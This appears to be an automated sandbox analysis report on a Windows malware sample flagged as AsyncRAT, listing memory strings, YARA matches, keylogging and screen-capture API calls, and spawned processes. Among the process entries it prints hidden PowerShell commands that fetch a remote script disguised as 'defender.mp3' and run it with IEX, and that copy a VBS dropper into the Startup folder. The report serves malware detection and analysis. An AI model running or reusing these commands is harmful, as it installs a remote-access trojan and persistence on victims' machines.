Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, powershell.exe, 0000000B.00000002.248780710.00000179D1290000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.493872523.00000133849AF000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.g
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gsH
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000002.244669019.00000179B8E41000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.494107143.0000013384A61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp	String found in binary or memory: http://secure.gl
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Ne - Copy.exe, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	String found in binary or memory: https://autohotkey.com
Source: xuXIetZvv6.exe, 00000000.00000000.219549326.00000000006E2000.00000002.00020000.sdmp, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmp	String found in binary or memory: https://autohotkey.comCould
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: xuXIetZvv6.exe, xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, wscript.exe, 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, wscript.exe, 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8
Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp	String found in binary or memory: https://www.globalsign.com
Source: conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.uplooder.net
Source: powershell.exe, 0000000E.00000002.491810873.0000013382F10000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.493315849.00000133830B5000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp	String found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3
Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp30y
Source: conhost.exe	String found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmp	String found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=openiexplore.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPED	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPED	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth

Dynamically executes javascript script code

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17CA0 SetFilePointer,ReadFile,CloseHandle,DestroyWindow,GetModuleFileNameW,#2,MessageBoxW,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe	Code function: 39_2_00007FF772C17EB0 SetFilePointer,ReadFile,CloseHandle,SetFilePointer,ReadFile,CloseHandle,DestroyWindow,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,#4,CLSIDFromProgID,CoCreateInstance,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,#4,#2,#2,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

Sample or dropped binary is a compiled AutoHotkey binary

Show sources

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Window found: window name: AutoHotkey

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,

Source: C:\ProgramData\conhost.exe

Code function: 8_2_00007FF7AAFD63C0 GetModuleFileNameW,CreateProcessWithLogonW,GetLastError,FormatMessageW,GetLastError,MessageBoxW,LocalFree,GetLastError,ExitProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CreateThread,CoInitialize,GetActiveWindow,SetLastError,GetCurrentThreadId,EnterCriticalSection,LeaveCriticalSection,DialogBoxParamW,CoUninitialize,

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F4C90
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F0168
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Code function: 0_2_00007FFA161F3280
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001E310
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001EB30
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000CF50
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140089180
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140005230
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001F300
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400415D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001F919
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140055950
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140001B0C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007FC00
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001FD1E
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140124000
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007C03F
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140070060
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D8074
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140028120
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000A120
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140050135
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005C140
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004C160
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400581A0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400741C0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140076200
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140080230
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005E250
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009825C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014002A2C0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400A82F0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140088360
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014006E380
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400503A4
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400523B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140040410
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140048490
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400BA53B
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014000A540
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007A570
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400CE59C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008E5B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400605B9
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400DC5FC
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140058660
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400BC670
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140074680
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140020680
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140032681
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400986A1
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400466C0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008C6C3
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140054730
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004A740
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400BA760
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D07B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400027BB
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400507D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007E830
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400448D0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007A8E0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014006C8F0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400A2900
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140064950
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400989AD
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400929C0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140034A15
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EA20
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140018A20
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140062A60
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140012A90
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140070AD0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005AB70
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140060B80
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140014BA0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014003EBC0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400DCBE0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140084C00
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400D4C18
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009CC50
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140006C60
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008CC90
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005CC90
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140034CA5
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400B0CD0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004ECD0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140056CE0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140010CF0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014009ED00
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005ED30
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140058D70
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140016D90
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014004ADC0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400AEE30
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140038E2C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014007CE48
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140050E90
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140070EA1
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140062ED0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EF7D
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EF8C
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EFA8
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EFCA
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EFEB
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005F000
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008EFF7
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008F01D
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140073050
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140099048
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014008F05E
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140087091
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014005B0B0
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400B70E0
